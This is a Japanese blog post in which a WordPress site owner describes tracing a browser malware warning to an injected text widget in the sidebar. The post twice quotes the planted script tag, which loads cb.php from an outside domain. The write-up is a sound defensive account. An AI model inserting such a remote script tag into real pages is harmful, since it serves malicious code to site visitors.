Wordpressで管理してるサイトを開こうと思ったら
「警告: 不正なソフトウェアが存在する可能性があります」
と表示されました。
サイト内のどこかに不正な→abrahamspath.org.ukヘのリンクを含んでいると。。。
まずは落ち着くこと。。。
冷静に冷静に。
一番はじめにサイトをメンテナンス中にしました。
次に、どこが改ざんされたんだろうとサーバー上のファイルをくまなく探しました。
タイムスタンプを見て、覚えのない時間に更新されたものを探しました。
でも、ないんです(><)
それらしき怪しい更新のファイルがない!
次にやったことは
1)
ルートディレクトリごとサーバーからダウンロードしました。
2)
後から原因究明できるかもしれないので、改ざんされた状態のまま
バックアップとりました。
3)
ネットを切断し、DWで全検索「abrahamspath」かけました。
すると出てきたんです!
データベースバックアップ プラグイン 「WP-DBManager」
その中のバックアップファイル
/wp-content/backup-db/ 内のsqlファイルです。
4)
そのファイルをテキストエディタ Terapad で開きました。
5)
そこでまた「abrahamspath」の検索。
そしたら
<script type=\"text/javascript\" src=\"http://abrahamspath.org.uk/cb.php\"></script>
がどこかに埋め込まれているようです!
正直、ソースを見てもどこなのかははっきりわからない!
だけど、上下のたまに出てくる文字列、リンクから察するに、
サイドバーのあたりじゃないかという気がしました。
6)
サイドバーのphpファイルを確認するも問題ない。。
次に見たのが ウィジェット です!
そこで見つけました!!!!!
サイドバーウィジェットの中に「テキスト」が作られていて
<script type=\"text/javascript\" src=\"http://abrahamspath.org.uk/cb.php\"></script>
ありました。
なぜそんなところ、すぐに見つけられなかったのか、
情けない限りですが(笑)
こんなパターンで不正なタグが書き込まれることもありますので、
参考までに(^^)
ローカルのウイルスチェックをして、感染してないことに一安心です!
パスワードはこまめに変えましょうね。
